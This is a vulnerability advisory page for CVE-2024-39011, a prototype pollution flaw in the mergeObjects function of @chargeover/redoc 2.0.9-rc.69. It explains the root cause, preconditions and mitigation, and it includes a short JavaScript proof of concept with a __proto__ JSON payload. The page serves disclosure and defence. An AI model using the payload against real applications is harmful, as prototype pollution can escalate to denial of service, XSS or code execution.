VYPR
← All advisories
Unrated severityNVD Advisory· Published Jul 30, 2024· Updated Aug 2, 2024

CVE-2024-39011

CVE-2024-39011

Description

Prototype pollution in @chargeover/redoc v2.0.9-rc.69 via mergeObjects allows attackers to modify Object.prototype, potentially leading to DoS, RCE, or XSS.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Prototype pollution in @chargeover/redoc v2.0.9-rc.69 via mergeObjects allows attackers to modify Object.prototype, potentially leading to DoS, RCE, or XSS.

Vulnerability

The package @chargeover/redoc version 2.0.9-rc.69 is vulnerable to prototype pollution through the function mergeObjects. An attacker can pass a crafted argument containing the property __proto__ to this function, which modifies the built-in Object.prototype. This allows the attacker to inject arbitrary properties into the prototype chain of all objects. The vulnerability is reachable when the library's mergeObjects function is called with user-controlled input, such as from a JSON payload. The affected version is explicitly 2.0.9-rc.69 [1].

Exploitation

An attacker needs to supply a specially crafted object (e.g., via a JSON payload containing {"__proto__":{"test":123}}) to the mergeObjects function. No authentication or special network position is required if the application passes untrusted data to this function. The provided proof-of-concept demonstrates that calling lib.mergeObjects(emptyObj, JSON.parse('{"__proto__":{"test":123}}')) pollutes Object.prototype, as evidenced by the victim.__proto__ object gaining the test property after the attack [1].

Impact

Successful exploitation allows the attacker to modify the properties of all objects inheriting from Object.prototype. Depending on the application's use of these properties (gadgets), the impact can lead to arbitrary code execution (RCE), Denial of Service (DoS), cross-site scripting (XSS), or other unintended behaviors. The attacker can escalate the prototype pollution into more severe attacks by leveraging affected gadgets within the runtime environment [1].

Mitigation

As of the advisory publication date (2024-07-30), no patched version of @chargeover/redoc has been released. Users should monitor the vendor for a fix. If the library is not required, consider replacing it with an alternative that is not vulnerable. If immediate mitigation is needed, sanitize inputs to the mergeObjects function to prevent the __proto__ key, or avoid passing untrusted data to the function. The advisory does not list this CVE in the Known Exploited Vulnerabilities (KEV) catalog [1].

References
  1. [CVE-2024-39011] Vulnerability Advisory: Prototype Pollution in @chargeover/redoc, version 2.0.9-rc.69

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • chargeover/redocdescription
  • Redoc/Redocllm-fuzzy
    Range: =2.0.9-rc.69

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing sanitization of `__proto__` keys in the `mergeObjects` function allows prototype pollution."

Attack vector

An attacker calls the `mergeObjects` function with a crafted object containing the special property `__proto__` [ref_id=1]. Because the function does not sanitize or block `__proto__` keys, the merge operation pollutes `Object.prototype`, altering the behavior of all objects that inherit from it [ref_id=1]. The attacker can then leverage this prototype pollution to achieve denial of service, remote code execution, or cross-site scripting, depending on available gadgets in the application [ref_id=1].

Affected code

The vulnerable function is `mergeObjects` in the `@chargeover/redoc` package version 2.0.9-rc.69 [ref_id=1]. The advisory does not specify the exact file path or line number within the package.

What the fix does

The advisory does not include a patch or remediation commit [ref_id=1]. To close the vulnerability, the `mergeObjects` function must filter out or reject keys such as `__proto__`, `constructor`, and `prototype` during the merge process, preventing modification of `Object.prototype` [ref_id=1].

Preconditions

  • configThe application must import and call the vulnerable mergeObjects function from @chargeover/redoc v2.0.9-rc.69
  • inputThe attacker must be able to supply a crafted JSON object containing a __proto__ key as an argument to mergeObjects

Reproduction

```javascript (async () => { const lib = await import('@chargeover/redoc'); var victim = {} console.log("Before Attack: ", JSON.stringify(victim.__proto__)); try { lib.mergeObjects(emptyObj, JSON.parse('{"__proto__":{"test":123}}')) } catch (e) { } console.log("After Attack: ", JSON.stringify(victim.__proto__)); delete Object.prototype.polluted; })(); ```

Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1

News mentions

0

No linked articles in our index yet.